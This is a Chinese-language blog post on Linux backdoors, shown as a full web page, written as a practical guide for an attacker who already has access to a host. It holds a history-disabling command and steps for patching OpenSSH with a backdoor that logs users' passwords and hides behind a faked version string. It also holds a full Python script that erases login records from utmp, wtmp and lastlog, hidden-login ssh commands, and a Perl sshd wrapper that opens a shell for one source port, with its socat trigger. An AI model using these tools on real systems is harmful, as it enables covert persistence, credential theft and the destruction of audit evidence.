<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Linux," />





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0" />






<meta name="description" content="记录之前所写的东西，这篇找不到原来的发布时间了。">
<meta name="keywords" content="Linux">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux后门">
<meta property="og:url" content="http://rcoil.me/2017/04/Linux小后门/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="记录之前所写的东西，这篇找不到原来的发布时间了。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://rcoil.me/image/Linux后门种类.png">
<meta property="og:updated_time" content="2017-09-10T13:39:57.709Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux后门">
<meta name="twitter:description" content="记录之前所写的东西，这篇找不到原来的发布时间了。">
<meta name="twitter:image" content="http://rcoil.me/image/Linux后门种类.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://rcoil.me/2017/04/Linux小后门/"/>





  <title> Linux后门 | RcoIl的窝 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br />
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://rcoil.me/2017/04/Linux小后门/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Linux后门
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-04-03T13:19:23+08:00">
                2017-04-03
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/系统安全/" itemprop="url" rel="index">
                    <span itemprop="name">系统安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/04/Linux小后门/" class="leancloud_visitors" data-flag-title="Linux后门">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>记录之前所写的东西，这篇找不到原来的发布时间了。<br><a id="more"></a><br><img src="/image/Linux后门种类.png" alt="Linux后门种类"></p>
<h2 id="PAM后门"><a href="#PAM后门" class="headerlink" title="PAM后门"></a>PAM后门</h2><p>需要编译环境</p>
<h3 id="概述："><a href="#概述：" class="headerlink" title="概述："></a>概述：</h3><p>PAM （Pluggable AuthenticationModules ）是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API，将系统提供的服务和该服务的认证方式分开，使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序，同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中，目前已移植到其它系统中，如Linux、SunOS、HP-UX9.0等。</p>
<h2 id="openssh后门"><a href="#openssh后门" class="headerlink" title="openssh后门"></a>openssh后门</h2><p>进入主机后，先执行：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace</div></pre></td></tr></table></figure></p>
<h3 id="SSH留后门"><a href="#SSH留后门" class="headerlink" title="SSH留后门"></a>SSH留后门</h3><p>简单来说就是以下的代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line">yum install -y openssl openssl-devel pam-devel</div><div class="line">http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz</div><div class="line">http://ftp.vim.org/security/OpenSSH/openssh-5.9p1.tar.gz</div><div class="line">tar zxvf openssh-5.9p1.tar.gz   </div><div class="line">tar zxvf 0x06-openssh-5.9p1.patch.tar.gz   </div><div class="line">cd openssh-5.9p1.patch/   </div><div class="line">cp sshbd5.9p1.diff ../openssh-5.9p1   </div><div class="line">cd ../openssh-5.9p1   </div><div class="line">patch &lt; sshbd5.9p1.diff   //patch  后门</div><div class="line">执行vi includes.h</div><div class="line"></div><div class="line">+#define ILOG &quot;/tmp/ilog&quot; //记录登录到本机的用户名和密码</div><div class="line">+#define OLOG &quot;/tmp/olog&quot; //记录本机登录到远程的用户名和密码</div><div class="line">+#define SECRETPW &quot;123456654321&quot; //你后门的密码</div><div class="line"></div><div class="line">执行vi version.h</div><div class="line"></div><div class="line">#define SSH_VERSION &quot;填入之前记下来的版本号,伪装原版本&quot;</div><div class="line">#define SSH_PORTABLE &quot;小版本号&quot;</div><div class="line">./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5</div><div class="line">make &amp;&amp; make install </div><div class="line">service sshd restart //重启sshd</div></pre></td></tr></table></figure></p>
<p>注意不同的ubuntu系统对应的安装命令会不一样，而且安装包名也会不一样。</p>
<h3 id="清除痕迹"><a href="#清除痕迹" class="headerlink" title="清除痕迹"></a>清除痕迹</h3><p>接下来删除登录的历史记录，使用logtamper.py代码：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># -*- coding:utf-8 -*-</span></div><div class="line"><span class="comment"># mail: cn.b4dboy@gmail.com</span></div><div class="line">  </div><div class="line"><span class="keyword">import</span> os, struct, sys</div><div class="line"><span class="keyword">from</span> pwd <span class="keyword">import</span> getpwnam</div><div class="line"><span class="keyword">from</span> time <span class="keyword">import</span> strptime, mktime</div><div class="line"><span class="keyword">from</span> optparse <span class="keyword">import</span> OptionParser</div><div class="line">  </div><div class="line">UTMPFILE = <span class="string">"/var/run/utmp"</span></div><div class="line">WTMPFILE = <span class="string">"/var/log/wtmp"</span></div><div class="line">LASTLOGFILE = <span class="string">"/var/log/lastlog"</span></div><div class="line">  </div><div class="line">LAST_STRUCT = <span class="string">'I32s256s'</span></div><div class="line">LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)</div><div class="line">  </div><div class="line">XTMP_STRUCT = <span class="string">'hi32s4s32s256shhiii4i20x'</span></div><div class="line">XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)</div><div class="line">  </div><div class="line">  </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getXtmp</span><span class="params">(filename, username, hostname)</span>:</span></div><div class="line">    xtmp = <span class="string">''</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        fp = open(filename, <span class="string">'rb'</span>)</div><div class="line">        <span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line">            bytes = fp.read(XTMP_STRUCT_SIZE)</div><div class="line">            <span class="keyword">if</span> <span class="keyword">not</span> bytes:</div><div class="line">                <span class="keyword">break</span></div><div class="line">  </div><div class="line">            data = struct.unpack(XTMP_STRUCT, bytes)</div><div class="line">            record = [(<span class="keyword">lambda</span> s: str(s).split(<span class="string">"\0"</span>, <span class="number">1</span>)[<span class="number">0</span>])(i) <span class="keyword">for</span> i <span class="keyword">in</span> data]</div><div class="line">            <span class="keyword">if</span> (record[<span class="number">4</span>] == username <span class="keyword">and</span> record[<span class="number">5</span>] == hostname):</div><div class="line">                <span class="keyword">continue</span></div><div class="line">            xtmp += bytes</div><div class="line">    <span class="keyword">except</span>:</div><div class="line">        showMessage(<span class="string">'Cannot open file: %s'</span> % filename)</div><div class="line">    <span class="keyword">finally</span>:</div><div class="line">        fp.close()</div><div class="line">    <span class="keyword">return</span> xtmp</div><div class="line">  </div><div class="line">  </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">modifyLast</span><span class="params">(filename, username, hostname, ttyname, strtime)</span>:</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        p = getpwnam(username)</div><div class="line">    <span class="keyword">except</span>:</div><div class="line">        showMessage(<span class="string">'No such user.'</span>)</div><div class="line">  </div><div class="line">    timestamp = <span class="number">0</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        str2time = strptime(strtime, <span class="string">'%Y:%m:%d:%H:%M:%S'</span>)</div><div class="line">        timestamp = int(mktime(str2time))</div><div class="line">    <span class="keyword">except</span>:</div><div class="line">        showMessage(<span class="string">'Time format err.'</span>)</div><div class="line">  </div><div class="line">    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)</div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        fp = open(filename, <span class="string">'wb'</span>)</div><div class="line">        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)</div><div class="line">        fp.write(data)</div><div class="line">    <span class="keyword">except</span>:</div><div class="line">        showMessage(<span class="string">'Cannot open file: %s'</span> % filename)</div><div class="line">    <span class="keyword">finally</span>:</div><div class="line">        fp.close()</div><div class="line">    <span class="keyword">return</span> <span class="keyword">True</span></div><div class="line">  </div><div class="line">  </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">showMessage</span><span class="params">(msg)</span>:</span></div><div class="line">    <span class="keyword">print</span> msg</div><div class="line">    exit(<span class="number">-1</span>)</div><div class="line">  </div><div class="line">  </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">saveFile</span><span class="params">(filename, contents)</span>:</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        fp = open(filename, <span class="string">'w+b'</span>)</div><div class="line">        fp.write(contents)</div><div class="line">    <span class="keyword">except</span> IOError <span class="keyword">as</span> e:</div><div class="line">        showMessage(e)</div><div class="line">    <span class="keyword">finally</span>:</div><div class="line">        fp.close()</div><div class="line">  </div><div class="line">  </div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    usage = <span class="string">'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \</span></div><div class="line"><span class="string">        logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'</span></div><div class="line">    parser = OptionParser(usage=usage)</div><div class="line">    parser.add_option(<span class="string">'-m'</span>, <span class="string">'--mode'</span>, dest=<span class="string">'MODE'</span>, default=<span class="string">'1'</span> , help=<span class="string">'1: utmp, 2: wtmp, 3: lastlog [default: 1]'</span>)</div><div class="line">    parser.add_option(<span class="string">'-t'</span>, <span class="string">'--ttyname'</span>, dest=<span class="string">'TTYNAME'</span>)</div><div class="line">    parser.add_option(<span class="string">'-f'</span>, <span class="string">'--filename'</span>, dest=<span class="string">'FILENAME'</span>)</div><div class="line">    parser.add_option(<span class="string">'-u'</span>, <span class="string">'--username'</span>, dest=<span class="string">'USERNAME'</span>)</div><div class="line">    parser.add_option(<span class="string">'-i'</span>, <span class="string">'--hostname'</span>, dest=<span class="string">'HOSTNAME'</span>)</div><div class="line">    parser.add_option(<span class="string">'-d'</span>, <span class="string">'--dateline'</span>, dest=<span class="string">'DATELINE'</span>)</div><div class="line">    (options, args) = parser.parse_args()</div><div class="line">  </div><div class="line">    <span class="keyword">if</span> len(args) &lt; <span class="number">3</span>:</div><div class="line">        <span class="keyword">if</span> options.MODE == <span class="string">'1'</span>:</div><div class="line">            <span class="keyword">if</span> options.USERNAME == <span class="keyword">None</span> <span class="keyword">or</span> options.HOSTNAME == <span class="keyword">None</span>:</div><div class="line">                showMessage(<span class="string">'+[Warning]: Incorrect parameter.\n'</span>)</div><div class="line">  </div><div class="line">            <span class="keyword">if</span> options.FILENAME == <span class="keyword">None</span>:</div><div class="line">                options.FILENAME = UTMPFILE</div><div class="line">  </div><div class="line">            <span class="comment"># tamper</span></div><div class="line">            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)</div><div class="line">            saveFile(options.FILENAME, newData)</div><div class="line">  </div><div class="line">        <span class="keyword">elif</span> options.MODE == <span class="string">'2'</span>:</div><div class="line">            <span class="keyword">if</span> options.USERNAME == <span class="keyword">None</span> <span class="keyword">or</span> options.HOSTNAME == <span class="keyword">None</span>:</div><div class="line">                showMessage(<span class="string">'+[Warning]: Incorrect parameter.\n'</span>)</div><div class="line">  </div><div class="line">            <span class="keyword">if</span> options.FILENAME == <span class="keyword">None</span>:</div><div class="line">                options.FILENAME = WTMPFILE</div><div class="line">  </div><div class="line">            <span class="comment"># tamper</span></div><div class="line">            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)</div><div class="line">            saveFile(options.FILENAME, newData)</div><div class="line">  </div><div class="line">        <span class="keyword">elif</span> options.MODE == <span class="string">'3'</span>:</div><div class="line">            <span class="keyword">if</span> options.USERNAME == <span class="keyword">None</span> <span class="keyword">or</span> options.HOSTNAME == <span class="keyword">None</span> <span class="keyword">or</span> options.TTYNAME == <span class="keyword">None</span> <span class="keyword">or</span> options.DATELINE == <span class="keyword">None</span>:</div><div class="line">                showMessage(<span class="string">'+[Warning]: Incorrect parameter.\n'</span>)</div><div class="line">  </div><div class="line">            <span class="keyword">if</span> options.FILENAME == <span class="keyword">None</span>:</div><div class="line">                options.FILENAME = LASTLOGFILE</div><div class="line">  </div><div class="line">            <span class="comment"># tamper</span></div><div class="line">            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)</div><div class="line">  </div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            parser.print_help()</div></pre></td></tr></table></figure></p>
<h3 id="隐身登陆"><a href="#隐身登陆" class="headerlink" title="隐身登陆"></a>隐身登陆</h3><p>隐藏的远程登录(w 看不到)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">ssh -T user @ host </div><div class="line">/bin/bash -i</div></pre></td></tr></table></figure></p>
<p>或</p>
<p>隐藏的远程登录(w 看不到)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">ssh -o UserKnownHostsFile=/dev/null -T user@host </div><div class="line">/bin/bash -if</div></pre></td></tr></table></figure></p>
<h2 id="SSH-wrapper后门"><a href="#SSH-wrapper后门" class="headerlink" title="SSH wrapper后门"></a>SSH wrapper后门</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>init首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候，正则匹配会失败，于是执行下一句，启动/usr/bin/sshd，这是原始sshd。原始的sshd监听端口建立了tcp连接后，会fork一个子进程处理具体工作。这个子进程，没有什么检验，而是直接执行系统默认的位置的/usr/sbin/sshd，这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字，getpeername能真的获取到客户端的TCP源端口，如果是19526就执行sh给个shell。</p>
<h3 id="目标端"><a href="#目标端" class="headerlink" title="目标端"></a>目标端</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">cd /usr/sbin</div><div class="line">mv sshd ../bin</div><div class="line">echo &apos;#!/usr/bin/perl&apos; &gt;sshd</div><div class="line">echo &apos;exec &quot;/bin/sh&quot; if(getpeername(STDIN) =~ /^..4A/);&apos; &gt;&gt;sshd</div><div class="line">echo &apos;exec&#123;&quot;/usr/bin/sshd&quot;&#125; &quot;/usr/sbin/sshd&quot;,@ARGV,&apos; &gt;&gt;sshd</div><div class="line">chmod u+x sshd</div><div class="line">/etc/init.d/sshd restart</div></pre></td></tr></table></figure>
<h3 id="控制端"><a href="#控制端" class="headerlink" title="控制端"></a>控制端</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">socat STDIOTCP4:target_ip:22,sourceport=19526</div></pre></td></tr></table></figure>
<h2 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h2><h3 id="Mafix"><a href="#Mafix" class="headerlink" title="Mafix"></a>Mafix</h3><p>Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="https://ooo.0o0.ooo/2017/04/12/58ee21687d335.png" alt="RcoIl WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://rcoil.me/2017/04/Linux小后门/" title="Linux后门">http://rcoil.me/2017/04/Linux小后门/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Linux</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/03/PHP-弱类型解题/" rel="next" title="PHP-弱类型解题">
                <i class="fa fa-chevron-left"></i> PHP-弱类型解题
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/04/STR2-045的简单利用/" rel="prev" title="STR2-045的简单利用">
                STR2-045的简单利用 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="RcoIl" />
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">43</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">10</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.agteam.net/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
